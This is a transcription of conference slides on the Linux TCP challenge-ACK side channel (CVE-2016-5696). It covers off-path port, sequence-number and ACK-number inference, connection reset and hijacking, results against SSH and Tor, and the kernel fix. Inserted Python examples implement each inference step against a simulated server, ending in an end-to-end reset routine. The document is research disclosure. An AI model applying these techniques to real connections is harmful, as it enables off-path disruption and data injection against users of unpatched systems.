Off-Path TCP Exploits : Global Rate Limit Considered Dangerous
1 Off-Path TCP Exploits: Global Rate Limit Considered Dangerous. Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V. Krishnamurthy, University of California, Riverside; Lisa M. Marvel, United States Army Research Laboratory. 25th USENIX Security Symposium, August 2016.
2 Threat Model: a pure blind off-path TCP attack. No man-in-the-middle position is needed, and no malicious code runs on the client or the server; the attacker only needs to send packets with a spoofed source IP and to have its own ordinary connection to the server.
3 Outline: Background Knowledge (TCP connection pre-RFC 5961; blind in-window attacks and RFC 5961; problems in RFC 5961); Attack Method (main idea; connection reset attack; connection hijacking attack); Evaluation; Defense; Related Works and Conclusion.
5 Transmission Control Protocol. Three-way handshake and data transfer between A and B: A to B: SYN, seq=30. B to A: SYN/ACK, seq=91, ack=31. A to B: ACK, seq=31, ack=92. B to A: seq=92, 8 bytes of data. A to B: seq=31, ack=100. B to A: seq=100, 8 bytes of data. A to B: seq=31, ack=108.
6 Sequence Number. The 32-bit sequence space runs from 0 to 4G and wraps. A receiver accepts segments whose sequence numbers fall inside its receive window, [RCV.NXT, RCV.NXT + RCV.WND).
8 Blind in-window attacks: connection termination (a spoofed RST) and data injection (a spoofed data segment). Success requirements: the four-tuple <src IP, src port, dst IP, dst port> and a proper (in-window) sequence number.
9 Blind in-window attacks. Example: while A and B exchange data (B to A: seq=92, 8B data and seq=100, 8B data; A to B: ack=100 and ack=108), an off-path attacker sends B a SYN carrying A's IP address as the source.
11 RFC 5961 (SYN). B receives a SYN on an established connection, apparently from A. Before RFC 5961: an in-window sequence number resets the connection, an out-of-window one gets an ACK back. With RFC 5961: whatever the sequence number, B sends a challenge ACK <SEQ=SND.NXT><ACK=RCV.NXT><CTL=ACK>.
12 RFC 5961 (SYN). If the SYN really came from A (A has lost its connection state), A answers the challenge ACK with a RST carrying the good sequence number, and the connection is torn down legitimately.
13 RFC 5961 (SYN). If the SYN was spoofed, the challenge ACK reaches the real A while its connection is intact (A sent seq=30, 8B data and has already seen ack=38); A treats the repeated ack=38 as a duplicate ACK and the connection survives.
14 Blind in-window attacks. Same setting (B to A: seq=92, 8B data; A to B: ack=100), but the attacker sends B a spoofed RST with A's IP address.
15 RFC 5961 (RST). Before RFC 5961: an in-window sequence number resets the connection, an out-of-window one is dropped. With RFC 5961: only a sequence number that exactly matches RCV.NXT resets; any other in-window value draws a challenge ACK <SEQ=SND.NXT><ACK=RCV.NXT><CTL=ACK>; out-of-window is dropped.
16 RFC 5961 (RST). If the RST really came from A, A answers the challenge ACK with a RST carrying the good sequence number, and the reset goes through.
17 RFC 5961 (RST). If the RST was spoofed, the challenge ACK is only a duplicate ACK to the real A; nothing is reset.
18 Blind in-window attacks. The attacker sends B spoofed data with A's IP address (B to A: seq=92, 8B data; A to B: ack=100). B asks two questions: is the sequence number in window, and is the ACK number acceptable?
19 Acceptable ACK numbers. Before RFC 5961: any ACK in [SND.UNA - 2G, SND.NXT] is accepted; values beyond SND.NXT are rejected. With RFC 5961: ACKs in [SND.UNA - SND.MAX.WIN, SND.NXT] are accepted, ACKs in [SND.UNA - 2G, SND.UNA - SND.MAX.WIN) draw a challenge ACK, and values beyond SND.NXT are still rejected.
21 ACK Throttling
22 ACK Throttling. To limit the CPU and bandwidth that challenge ACKs consume, RFC 5961 suggests rate-limiting them. The Linux kernel faithfully implemented this, keeping the counter in a single global variable, sysctl_tcp_challenge_ack_limit, which controls the maximum number of challenge ACKs generated per second.
23 sysctl_tcp_challenge_ack_limit is 100 by default and is shared by all TCP connections. That sharing is what leaks information: an attacker with its own connection to the server can measure how much of the shared budget other connections consumed in the same second.
25 RFC 5961 in summary. An acceptable SYN packet needs the four-tuple <src IP, src port, dst IP, dst port> and an in-window sequence number. An acceptable RST packet needs the four-tuple and the correct sequence number (exactly RCV.NXT). An acceptable data packet needs the four-tuple, an in-window sequence number and an acceptable ACK number. Every packet that has the four-tuple but fails the rest draws a challenge ACK.
26 Main idea (recap of slide 13). A spoofed SYN on a matching four-tuple draws a challenge ACK <SEQ=SND.NXT><ACK=RCV.NXT><CTL=ACK> whether its sequence number is in window or out of window; the real client only sees a duplicate ACK (ack=38 for the data it sent at seq=30) and keeps the connection. What matters to the attacker is that the challenge ACK was generated and counted against the shared limit.
27 Assume no packet loss first.
28 Probing a source port, correct guess. The attacker spoofs a SYN (or SYN/ACK) with the client's IP and the guessed source port. The four-tuple matches, so the server sends the client a challenge ACK and the global budget drops from 100 to 99. The attacker then sends 100 in-window RSTs on its own connection and gets back only 99 challenge ACKs.
29 Probing a source port, wrong guess. The four-tuple matches no connection, so the server answers the spoofed packet with a RST and the budget stays at 100. The attacker's 100 in-window RSTs now yield 100 challenge ACKs.
31 Connection Reset Attack. Goal: deliver a spoofed RST whose sequence number exactly matches RCV.NXT. Problems to solve first: time synchronization with the server's rate-limit interval; the four-tuple (the client's source port); the sequence number.
32 Time problem. The limit is counted per 1-second interval on the server's clock. If the spoofed SYN (or SYN/ACK) with the client's IP and the attacker's 100 in-window RSTs fall inside the same interval, a correct guess yields 99 challenge ACKs.
33 Time problem. If an interval boundary falls between the spoofed SYN and the 100 RSTs, the counter has already been reset and the attacker sees 100 challenge ACKs whether or not the guess was correct. The attacker therefore has to learn where the server's interval boundaries lie.
34 Synchronization, step 1. Send 200 in-window RSTs spread evenly over one second (bandwidth limited: one packet every 5 ms) and count the challenge ACKs, n1. If n1 == 100, all 200 fell into one server interval: synchronized. If n1 > 100, the packets straddled an interval boundary: next round.
35 Synchronization, step 2. Send the same 200 RSTs delayed by 5 ms, which shifts the train by one packet, and count n2. If n2 == 100: synchronized. If n2 > 100: next round.
36 Synchronization, step 3 (compare). Assume that in step 1 x RSTs arrived in the first 1-second interval on the server and y = 200 - x in the second: n1 = min(x, 100) + min(y, 100). In step 2, x - 1 arrive in the first interval and y + 1 in the second: n2 = min(x - 1, 100) + min(y + 1, 100).
37 Synchronization, step 3 (compare). If n1 > n2, the first interval was not saturated (x <= 100) and the second was (y >= 100), so n2 = (x - 1) + 100, i.e. x - 1 = n2 - 100 packets of step 2 preceded the boundary. The boundary lies (n2 - 100) × 5 ms after the start of step 2, so delay the next round by that amount.
38 Synchronization, step 3 (compare). If n2 > n1, the first interval was saturated (x > 100) and the second was not (y < 100), so n2 = 100 + (y + 1) = 301 - x, i.e. x - 1 = 300 - n2. The boundary lies (300 - n2) × 5 ms after the start of step 2.
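The two-round synchronization above, as an added example that is not part of the original slides. It simulates a server whose global challenge-ACK counter refills on its own 1-second boundaries with a phase the attacker does not know, runs the 200-RST probe twice and applies the slide 37 and 38 arithmetic. The Server class, its parameters and the quiet second inserted between the two rounds are assumptions of this example, not the paper's setup.

```python
"""Synchronising with the server's 1-second challenge-ACK interval (slides 34-38).

Added example, not code from the paper.  The server is simulated: a global
budget of 100 challenge ACKs that refills when the server's clock crosses a
whole second.  The hidden value is the phase of that clock on the attacker's
clock.  Every probe is an in-window RST on the attacker's own legitimate
connection, so each answered probe costs one unit of the shared budget.  No
packet loss and no competing challenge-ACK traffic are assumed.
"""
LIMIT = 100  # sysctl_tcp_challenge_ack_limit default


class Server:
    def __init__(self, phase_ms):
        # hidden: the server's interval boundary, in attacker-clock ms, mod 1000
        self.phase_ms = phase_ms
        self.budget, self.interval = LIMIT, None

    def rst(self, t_ms):
        """In-window RST arriving at attacker time t_ms; True if a challenge ACK returns."""
        interval = (t_ms - self.phase_ms) // 1000
        if interval != self.interval:  # crossed a boundary: fresh budget
            self.interval, self.budget = interval, LIMIT
        if self.budget:
            self.budget -= 1
            return True
        return False


def probe_round(server, start_ms, n=200, spacing_ms=5):
    """Spread n RSTs over one second (one every 5 ms) and count the challenge ACKs."""
    return sum(server.rst(start_ms + i * spacing_ms) for i in range(n))


def synchronise(server, t0_ms=0, n=200, spacing_ms=5):
    """Return an attacker-clock time (ms) at which a server interval starts.

    Round 1 counts n1 = min(x, 100) + min(y, 100), where x RSTs land before the
    boundary and y = n - x after it.  Round 2 starts one spacing later (after a
    quiet second, so the budget round 1 drained has been refilled), which moves
    one packet across the boundary: n2 = min(x - 1, 100) + min(y + 1, 100).
    """
    n1 = probe_round(server, t0_ms, n, spacing_ms)
    if n1 == LIMIT:  # all n fell into one interval: t0 is on the boundary
        return t0_ms
    t1 = t0_ms + 2000 + spacing_ms
    n2 = probe_round(server, t1, n, spacing_ms)
    if n1 > n2:  # x <= 100 and y >= 100: n2 = (x - 1) + 100
        before_boundary = n2 - LIMIT
    else:        # x > 100 and y < 100: n2 = 100 + (y + 1) = 100 + n - x + 1
        before_boundary = LIMIT + n - n2
    return t1 + before_boundary * spacing_ms
```

The quiet second between the rounds matters: if round 2 started immediately after round 1, its first packets would land in the interval round 1 had already drained to zero, the counts would mix, and the formulas above would no longer hold. The result is exact to within one packet spacing (5 ms here).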
39 Four-tuple. The client's IP and the server's IP and port are known to the attacker; the unknown is the client's source port number.
40 (recap of slide 11) Whether the spoofed SYN's sequence number is in window or out of window, a matching four-tuple draws a challenge ACK and a non-matching one draws a plain RST, so the port can be probed without knowing any sequence number.
41 Binary search for the port number. The port space is 2^16 = 65536 values. Test the first half of the range in the first round: if the port does not fall in it, it must fall in the other half. The attacker narrows the space by half each round, so 16 rounds suffice.
44 Search for port number. The number of packets the attacker can send per second may be limited (anywhere from 1 to 1000), so a whole half of the port space cannot be tested in one round. In that case the attacker simply tries as many port numbers as possible in each round.
45 Search for sequence number
46 (recap of slide 15) For a spoofed RST on the right four-tuple: an exact match with RCV.NXT resets the connection, any other in-window sequence number draws a challenge ACK, and an out-of-window one is silently dropped. The challenge ACK is the signal the sequence-number search relies on.
47 Search for sequence number. The attacker first establishes a non-spoofed TCP connection with the server to learn the server's initial receive window size, then divides the 4G sequence space into blocks whose size equals that window size (block = window size).
48 1. Search for block size. Send one RST at seq 0 and one at seq 2×WIN in the same round. 100 challenge ACKs back: neither is in the window (not in this chunk). 99: one of them is in the window (in this chunk). Fewer than 99: more than one probe landed in the window, so the real window is larger than assumed; double the block size and retry.
50 Search for sequence number. Probe one RST per chunk (a chunk spans one window size), stepping through the chunks of the 4G space.
51 Multi-bin search for sequence number. Probe several chunks per round with distinct counts: 1 RST at chunk 0, 2 at chunk 1, 3 at chunk 2, 4 at chunk 3, and so on. Only one chunk start can lie inside a window-sized receive window, so the deficit identifies it: 99 challenge ACKs back means block 0, 98 means block 1, 97 means block 2, etc.
52 Search for RCV.NXT. Once an in-window sequence number is known, RCV.NXT lies at most one window size below it. Any spoofed RST whose sequence number is less than RCV.NXT is out of window and triggers no challenge ACK, while values from RCV.NXT up to the known in-window number do, so the left edge of the window can be searched. Block = window size.
53 Multi-bin search for RCV.NXT. Send one RST at each of several evenly spaced positions in the block; the number that trigger challenge ACKs is the number of positions at or above RCV.NXT: 100 back means block 0, 99 means block 1, 98 means block 2, etc.
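The port search (slides 41-44) and the sequence-number search (slides 47-53), as one added example that is not code from the paper. A simulated server holds a hidden client port and RCV.NXT and applies the slide 25 rules with a global budget of 100 challenge ACKs per round; the attacker's measurement is always the slide 28/29 one, spoofed probes followed by 100 in-window RSTs on its own connection. The Server class, the probe helper, the sample port and sequence values in the tests, and the power-of-two chunk weights are assumptions of this example. The left-edge search uses the slide 62 data-packet trick by default so that it cannot reset the connection before the attacker intends to.

```python
"""Port and sequence-number inference over the challenge-ACK side channel
(slides 41-44 and 47-53).

Added example, not code from the paper.  The victim server is simulated: one
connection whose client port and RCV.NXT are hidden from the attacker, the
RFC 5961 rules from slide 25, and a global budget of 100 challenge ACKs per
interval (sysctl_tcp_challenge_ack_limit).  Every probing round is assumed to
sit inside one server interval with no packet loss.  The attacker knows the
client IP, the server IP and port, and the window size learned from its own
connection (slide 47).  Chunk probes use power-of-two counts instead of the
slides' 1, 2, 3, ... so that two chunk starts landing in the window at once
still decode; that is a choice made here, not the paper's.
"""
LIMIT = 100         # sysctl_tcp_challenge_ack_limit default
MASK = 0xFFFFFFFF   # 32-bit sequence space


class Server:
    def __init__(self, client_port, rcv_nxt, rcv_wnd):
        self.client_port, self.rcv_nxt, self.rcv_wnd = client_port, rcv_nxt, rcv_wnd
        self.budget = LIMIT
        self.reset = False  # set once a RST with seq == RCV.NXT gets through

    def _challenge(self):
        if self.budget:
            self.budget -= 1

    def _in_window(self, seq):
        return ((seq - self.rcv_nxt) & MASK) < self.rcv_wnd

    def syn(self, port):
        """Slide 11: a SYN on an existing 4-tuple draws a challenge ACK; on a wrong
        4-tuple the server just answers RST, which costs no budget."""
        if port == self.client_port:
            self._challenge()

    def rst(self, port, seq):
        """Slide 15: exact RCV.NXT resets, other in-window values draw a challenge
        ACK, anything out of window is dropped."""
        if port != self.client_port:
            return
        if seq == self.rcv_nxt:
            self.reset = True
        elif self._in_window(seq):
            self._challenge()

    def data(self, port, seq):
        """Slide 62: in-window data whose ACK number is deliberately inside the
        challenge-ACK window draws a challenge ACK and is otherwise dropped, so
        it can never reset the connection or inject anything."""
        if port == self.client_port and self._in_window(seq):
            self._challenge()


def probe(server, sends):
    """One interval: replay the spoofed probes, then drain what is left with 100
    in-window RSTs on the attacker's own connection.  Returns how many challenge
    ACKs the spoofed probes consumed (100 minus the replies the attacker saw)."""
    server.budget = LIMIT
    for fn, *args in sends:
        fn(*args)
    return LIMIT - server.budget


def find_port(server, per_round=1 << 15):
    """Slides 41-44: halve the candidate range each round; when bandwidth is
    limited, at most per_round spoofed SYNs go out per round."""
    cand, rounds = range(1, 1 << 16), 0
    while len(cand) > 1:
        batch = cand[:min(len(cand) // 2, per_round)]
        hit = probe(server, [(server.syn, p) for p in batch]) > 0
        cand = batch if hit else cand[len(batch):]
        rounds += 1
    return cand[0], rounds


def find_in_window_seq(server, port, wnd):
    """Slides 47-51: one RST at the start of each window-sized chunk, six chunks
    per round with 1, 2, 4, ... copies (63 < 100), so the deficit is a bitmask
    of the chunk starts that fell inside the receive window."""
    starts = range(0, 1 << 32, wnd)
    for base in range(0, len(starts), 6):
        group = starts[base:base + 6]
        sends = [(server.rst, port, s) for w, s in enumerate(group) for _ in range(1 << w)]
        deficit = probe(server, sends)
        if deficit:
            return next(s for w, s in enumerate(group) if deficit >> w & 1)
    raise RuntimeError("no chunk start hit; window larger than assumed (slide 48)?")


def find_rcv_nxt(server, port, wnd, seq, bins=4, avoid_reset=True):
    """Slides 52-53: RCV.NXT lies in (seq - wnd, seq].  A probe draws a challenge
    ACK iff its sequence number is >= RCV.NXT, so the deficit counts how many of
    the evenly spaced bin edges are at or above RCV.NXT.  Data probes (slide 62)
    avoid resetting the connection when a probe lands exactly on RCV.NXT."""
    send = server.data if avoid_reset else server.rst
    lo, hi = seq - wnd, seq  # lo is silent, hi draws a challenge ACK
    while hi - lo > 1:
        edges = [lo + (hi - lo) * j // (bins + 1) for j in range(1, bins + 1)]
        hit = probe(server, [(send, port, e & MASK) for e in edges])
        pts = [lo] + edges + [hi]
        lo, hi = pts[bins - hit], pts[bins - hit + 1]
    return hi & MASK


def reset_connection(server, wnd):
    """The whole connection reset attack of slide 31, end to end."""
    port, _ = find_port(server)
    seq = find_in_window_seq(server, port, wnd)
    nxt = find_rcv_nxt(server, port, wnd, seq)
    server.rst(port, nxt)
    return port, nxt, server.reset
```

With bins=1 the RCV.NXT search is the plain binary search; with four bins each round answers a five-way question, which is the slide 53 multi-bin variant. Neither the chunk scan nor the left-edge search ever needs more than 100 challenge ACKs in a round, which is what keeps the deficit readable.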
55 Connection Hijacking Attack: inject spoofed data. Problems to solve: time synchronization; the four-tuple; the sequence number; preventing an accidental connection reset; the ACK number.
57 (recap of slide 19) Acceptable ACK numbers before RFC 5961: [SND.UNA - 2G, SND.NXT]. With RFC 5961: [SND.UNA - SND.MAX.WIN, SND.NXT] is accepted, [SND.UNA - 2G, SND.UNA - SND.MAX.WIN) draws a challenge ACK, and values beyond SND.NXT are rejected.
58 ACK number. With window scaling (RFC 1323), MAX.SND.WND can grow from 2^16 to at most 1G, so the challenge-ACK window [SND.UNA - 2G, SND.UNA - MAX.SND.WND) is between 1G and 2G wide.
60 ACK number. Because the challenge-ACK window is at least 1G wide, the attacker can send 1 packet with ACK number 0, 2 packets at 1G, 4 at 2G and 8 at 3G in a single round; the number of challenge ACKs consumed reveals which of the four anchor points fall inside the challenge-ACK window.
61 ACK number. With the rough position of the challenge-ACK window known from the previous step, the same search method locates its left edge, SND.UNA - (2^31 - 1). Once that edge is found, SND.UNA and therefore an acceptable ACK value (SND.UNA) can be computed.
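The ACK-number inference of slides 57-61 as an added example, not the paper's code. It encodes the acceptance regions of slide 19 with 32-bit modular comparisons (modelled on the Linux before()/after() helpers, an assumption made here), decodes the 1/2/4/8 probe of slide 60, and bisects the left edge of the challenge-ACK window to recover SND.UNA. The Sender class and the sample SND.UNA, SND.NXT and window values are constructed for the example.

```python
"""ACK-number inference for data injection (slides 57-61).

Added example, not code from the paper.  The sender side of the victim
connection is simulated with the rules the slides give for Linux: ACKs in
[SND.UNA - MAX.SND.WND, SND.NXT] are accepted, ACKs up to 2^31 further behind
SND.UNA draw a challenge ACK, ACKs ahead of SND.NXT are dropped.  Comparing
sequence numbers modulo 2^32 with before()/after() as the Linux helpers of
those names do is an assumption about the implementation.  Each spoofed
segment is taken to already carry an inferred in-window sequence number, and
the global budget is 100 challenge ACKs per interval.
"""
MASK = 0xFFFFFFFF
G = 1 << 30
LIMIT = 100


def before(a, b):
    """a precedes b in 32-bit modular order: (a - b) wraps to a negative s32."""
    return ((a - b) & MASK) >= 1 << 31


def classify_ack(ack, snd_una, snd_nxt, max_snd_wnd, rfc5961=True):
    """How the receiver treats SEG.ACK, before and after the RFC 5961 check."""
    if before(ack, snd_una):
        if rfc5961 and before(ack, (snd_una - max_snd_wnd) & MASK):
            return "challenge"   # slide 19: [SND.UNA - 2G, SND.UNA - MAX.SND.WND)
        return "accept"          # old but tolerated ACK
    if before(snd_nxt, ack):     # after(ack, snd_nxt)
        return "drop"
    return "accept"


class Sender:
    def __init__(self, snd_una, inflight, max_snd_wnd):
        self.snd_una = snd_una
        self.snd_nxt = (snd_una + inflight) & MASK
        self.max_snd_wnd = max_snd_wnd
        self.budget = LIMIT

    def probe_round(self, probes):
        """One interval: spoofed segments as (ack, copies).  Returns the deficit
        that the attacker's own 100 in-window RSTs reveal afterwards."""
        self.budget = LIMIT
        for ack, copies in probes:
            for _ in range(copies):
                if self.budget and classify_ack(ack, self.snd_una, self.snd_nxt,
                                                self.max_snd_wnd) == "challenge":
                    self.budget -= 1
        return LIMIT - self.budget


def locate_challenge_window(sender):
    """Slide 60: 1, 2, 4 and 8 copies at ACK 0, 1G, 2G and 3G.  The window is
    between 1G and 2G wide, so one or two adjacent anchors hit; the deficit is a
    bitmask naming them."""
    anchors = [0, G, 2 * G, 3 * G]
    deficit = sender.probe_round([(a, 1 << i) for i, a in enumerate(anchors)])
    return [a for i, a in enumerate(anchors) if deficit >> i & 1]


def find_snd_una(sender):
    """Slide 61: search the left edge of the challenge-ACK window.  ACKs just below
    it wrap round to 'ahead of SND.NXT' and are dropped, ACKs at or above it draw
    a challenge ACK, so one probe per round bisects the 1G gap below the lowest
    anchor that hit.  SND.UNA is the edge plus 2^31."""
    hits = locate_challenge_window(sender)
    lowest = next(a for a in hits if ((a - G) & MASK) not in hits)
    lo, hi = (lowest - G) & MASK, lowest  # lo is silent, hi draws a challenge ACK
    while (hi - lo) & MASK > 1:
        mid = (lo + ((hi - lo) & MASK) // 2) & MASK
        if sender.probe_round([(mid, 1)]):
            hi = mid
        else:
            lo = mid
    return (hi + (1 << 31)) & MASK
```

The bisection needs 30 rounds after the four-anchor round, one second each; every probe uses one packet, so the global budget is never in doubt. Note that the same modular comparison that makes the challenge window well defined is also what lets ACKs below its left edge wrap round into the "ahead of SND.NXT" region and go silent, which is the monotone boundary the search depends on.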
62 Preventing connection reset. Assume an in-window sequence number has already been inferred. The spoofed data packets carry ACK numbers that fall in the challenge-ACK window and therefore intentionally trigger challenge ACKs instead of being accepted; unlike a RST they can never reset the connection. If the guessed sequence number is before RCV.NXT, no challenge ACK is triggered, so the search signal is the same as with RSTs.
63 Packet loss. Every time a plausible chunk is detected, repeat the probe on the same chunk to confirm it. Instead of sending 1, 2 or 3 packets per block, send 1, 3 and 5, so that every legitimate deficit is odd: if an even number of challenge ACKs comes back, a packet must have been lost and the round is repeated.
64 Moving window. The receive window advances as the connection carries data, so once the left-most in-window sequence number is inferred the attacker fires 20,000 RST packets with sequence numbers at offsets 1, 2, ..., 20,000 from the inferred value, covering the positions RCV.NXT may have moved to in the meantime.
65 Configurable maximum challenge ACK count. If the limit is not the default 100, the attacker establishes a legitimate connection and sends many in-window RSTs on it (far more than 100) to trigger as many challenge ACKs as possible; the number that come back within one second is the limit.
67 SSH Connection Reset. Victim SSH servers: Amazon EC2 instances worldwide. Victim client: Ubuntu host at the University of California, Riverside. Attacker: Ubuntu host in the lab.
68-70 SSH Connection Reset (result figures)
71 Tor Connection Reset. Tor relay: Ubuntu host at the University of California, Riverside, running for several months and used by a real user (in lab). Attacker: Ubuntu host in the lab. The other relays tested were outside the lab.
72 Tor Connection Reset. Tested between our own Tor relay and 40 other Tor relays. 16 of them do not appear vulnerable to the side-channel attack. For the remaining 24 hosts, the average success rate is 88.8% and the average time to reset is 51.1 s.
73 Moving Window (result figure)
74 TCP Hijacking Case Study: a long-lived TCP connection that periodically retrieves news updates every 30 seconds. Attacker machine: Ubuntu (in lab). Victim client: Ubuntu (in lab).
75 TCP Hijacking Case Study (result figure)
77 Defense. Windows, Mac OS X and FreeBSD do not implement all three conditions that trigger challenge ACKs according to RFC 5961, so they do not expose the same global counter. For Linux, two fixes are proposed: give each connection a completely separate counter, or use a random value for the limit in each ACK-throttling interval, so that the count an attacker observes no longer reveals how many challenge ACKs other connections consumed. The vulnerability was assigned CVE-2016-5696; the fix that shipped in Linux 4.7 takes the second route and randomizes the per-interval limit. On a host you operate, check the kernel version and the value of net.ipv4.tcp_challenge_ack_limit before assuming the channel is closed.
79 Related Works. Earlier off-path TCP sequence number inference relied on executing malicious code on the client side [22] [23] [14] [16] [17] [1]. Other types of information can be inferred from TCP sequence numbers [12] [21] [11] [29] [5] [15].
80 Conclusions. We have discovered a subtle yet critical flaw in the design and implementation of TCP: the challenge-ACK rate limit of RFC 5961, as implemented in Linux, is a side channel. It affects all Linux kernel versions from 3.6 up to the fix in 4.7 and may be replicated in other operating systems if left unnoticed.
81 Questions?
Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial Paper by Rocky K C Chang, The Hong Kong Polytechnic University Published in the October 2002 issue of IEEE Communications
More informationOur Narrow Focus Computer Networking Security Vulnerabilities. IP-level vulnerabilities
Our Narrow Focus 15-441 15-441 Computer Networking 15-641 Lecture 22 Security: DOS Peter Steenkiste Fall 2014 www.cs.cmu.edu/~prs/15-441-f14 Yes: Creating a secure channel for communication (Part I) Protecting
More informationNetwork Attacks. CS Computer Security Profs. Vern Paxson & David Wagner
Network Attacks CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationComputer Networks. Transmission Control Protocol. Jianping Pan Spring /3/17 CSC361 1
Computer Networks Transmission Control Protocol Jianping Pan Spring 2017 2/3/17 CSC361 1 https://connex.csc.uvic.ca/portal NSERC USRA awards available at UVic CSc for 2017/18 2/3/17 CSC361 2 TCP Transmission
More informationCSC 4900 Computer Networks: TCP
CSC 4900 Computer Networks: TCP Professor Henry Carter Fall 2017 Project 2: mymusic You will be building an application that allows you to synchronize your music across machines. The details of which are
More informationConfiguring Flood Protection
Configuring Flood Protection NOTE: Control Plane flood protection is located on the Firewall Settings > Advanced Settings page. TIP: You must click Accept to activate any settings you select. The Firewall
More informationNetwork Security. Evil ICMP, Careless TCP & Boring Security Analyses. Mohamed Sabt Univ Rennes, CNRS, IRISA Thursday, October 4th, 2018
Network Security Evil ICMP, Careless TCP & Boring Security Analyses Mohamed Sabt Univ Rennes, CNRS, IRISA Thursday, October 4th, 2018 Part I Internet Control Message Protocol (ICMP) Why ICMP No method
More informationSun Mgt Bonus Lab 2: Zone and DoS Protection on Palo Alto Networks Firewalls 1
Sun Mgt Bonus Lab 2: Zone and DoS Protection on Palo Alto Networks Firewalls 1 Overview Denial of Service (DoS) and Distributed Denial of Service (DDoS) types of attack are attempts to disrupt network
More informationFirewalls and NAT. Firewalls. firewall isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others.
Firews and NAT 1 Firews By conventional definition, a firew is a partition made of fireproof material designed to prevent the spread of fire from one part of a building to another. firew isolates organization
More information8. TCP Congestion Control
8. TCP Congestion Control 1 TCP Congestion Control Slow-start increase Multiplicative decrease Congestion avoidance Measurement of variation Exponential timer backoff 2002 Yanghee Choi 2 Congestion Control
More informationCS457 Transport Protocols. CS 457 Fall 2014
CS457 Transport Protocols CS 457 Fall 2014 Topics Principles underlying transport-layer services Demultiplexing Detecting corruption Reliable delivery Flow control Transport-layer protocols User Datagram
More informationYAF A Case Study in Flow Meter Design
YAF A Case Study in Flow Meter Design presented at FloCon 2008 - Savannah, Georgia Brian Trammell Technical Lead, Engineering CERT Network Situational Awareness YAF Open-source, IPFIX-compliant bidirectional
More informationStatic Detection of Packet Injection Vulnerabilities A Case for Identifying Attacker-controlled Implicit Information Leaks
Static Detection of Packet Injection Vulnerabilities A Case for Identifying Attacker-controlled Implicit Information Leaks Qi Alfred Chen, Zhiyun Qian, Yunhan Jack Jia, Yuru Shao, Z. Morley Mao University
More informationDENIAL OF SERVICE ATTACKS
DENIAL OF SERVICE ATTACKS Ezell Frazier EIS 4316 November 6, 2016 Contents 7.1 Denial of Service... 2 7.2 Targets of DoS attacks... 2 7.3 Purpose of flood attacks... 2 7.4 Packets used during flood attacks...
More informationThe Transport Layer: TCP & Reliable Data Transfer
The Transport Layer: TCP & Reliable Data Transfer Smith College, CSC 249 February 15, 2018 1 Chapter 3: Transport Layer q TCP Transport layer services: v Multiplexing/demultiplexing v Connection management
More informationAuthors. Passive Data Link Layer Wireless Device Driver Fingerprinting. Agenda OVERVIEW. Problems. Device Drivers
Passive Data Link Layer 802.11 Wireless Device Driver Fingerprinting Presenter: Tyler Sidell April 2, 2008 Authors Jason Franklin, Carnegie Mellon Damon McCoy, University of Colorado Paria Tabriz, University
More informationFlashback.. Internet design goals. Security Part One: Attacks and Countermeasures. Why did they leave it out? Security Vulnerabilities
Flashback.. Internet design goals Security Part One: Attacks and Countermeasures 15-441 With slides from: Debabrata Dash,Nick Feamster, Vyas Sekar 15-411: F08 security 1 1. Interconnection 2. Failure resilience
More informationDenial of Service (DoS)
Flood Denial of Service (DoS) Comp Sci 3600 Security Outline Flood 1 2 3 4 5 Flood 6 7 8 Denial-of-Service (DoS) Attack Flood The NIST Computer Security Incident Handling Guide defines a DoS attack as:
More informationNT1210 Introduction to Networking. Unit 10
NT1210 Introduction to Networking Unit 10 Chapter 10, TCP/IP Transport Objectives Identify the major needs and stakeholders for computer networks and network applications. Compare and contrast the OSI
More informationHello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud
Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss, Carlo Alberto Boano, Stefan Mangard, Kay Römer
More informationTransmission Control Protocol. ITS 413 Internet Technologies and Applications
Transmission Control Protocol ITS 413 Internet Technologies and Applications Contents Overview of TCP (Review) TCP and Congestion Control The Causes of Congestion Approaches to Congestion Control TCP Congestion
More informationNetwork Research and Linux at the Hamilton Institute, NUIM.
Network Research and Linux at the Hamilton Institute, NUIM. David Malone 4 November 26 1 What has TCP ever done for Us? Demuxes applications (using port numbers). Makes sure lost data is retransmitted.
More informationECE 435 Network Engineering Lecture 10
ECE 435 Network Engineering Lecture 10 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 28 September 2017 Announcements HW#4 was due HW#5 will be posted. midterm/fall break You
More informationRAPTOR: Routing Attacks on Privacy in Tor. Yixin Sun. Princeton University. Acknowledgment for Slides. Joint work with
RAPTOR: Routing Attacks on Privacy in Tor Yixin Sun Princeton University Joint work with Annie Edmundson, Laurent Vanbever, Oscar Li, Jennifer Rexford, Mung Chiang, Prateek Mittal Acknowledgment for Slides
More informationLecture 8. TCP/IP Transport Layer (2)
Lecture 8 TCP/IP Transport Layer (2) Outline (Transport Layer) Principles behind transport layer services: multiplexing/demultiplexing principles of reliable data transfer learn about transport layer protocols
More informationINF5290 Ethical Hacking. Lecture 3: Network reconnaissance, port scanning. Universitetet i Oslo Laszlo Erdödi
INF5290 Ethical Hacking Lecture 3: Network reconnaissance, port scanning Universitetet i Oslo Laszlo Erdödi Lecture Overview Identifying hosts in a network Identifying services on a host What are the typical
More informationECE 358 Project 3 Encapsulation and Network Utilities
ECE 358 Project 3 Encapsulation and Network Utilities Objective: After this project, students are expected to: i. Understand the format of standard frames and packet headers. ii. Use basic network utilities
More informationCS670: Network security
Cristina Nita-Rotaru CS670: Network security ARP, TCP 1: Background on network protocols OSI/ISO Model Application Presentation Session Transport Network Data Link Physical Layer Application Presentation
More informationNetwork Security Issues, Part 1
Network Security Issues, Part 1 EE 122 - Networking Prof. Vern Paxson November 18, 2013 Game Plan Two network security lectures Today: threats at different Internet layers Next Monday: building secure
More informationCMPE 150/L : Introduction to Computer Networks. Chen Qian Computer Engineering UCSC Baskin Engineering Lecture 10
CMPE 150/L : Introduction to Computer Networks Chen Qian Computer Engineering UCSC Baskin Engineering Lecture 10 1 Midterm exam Midterm next Thursday Close book but one-side 8.5"x11" note is allowed (must
More information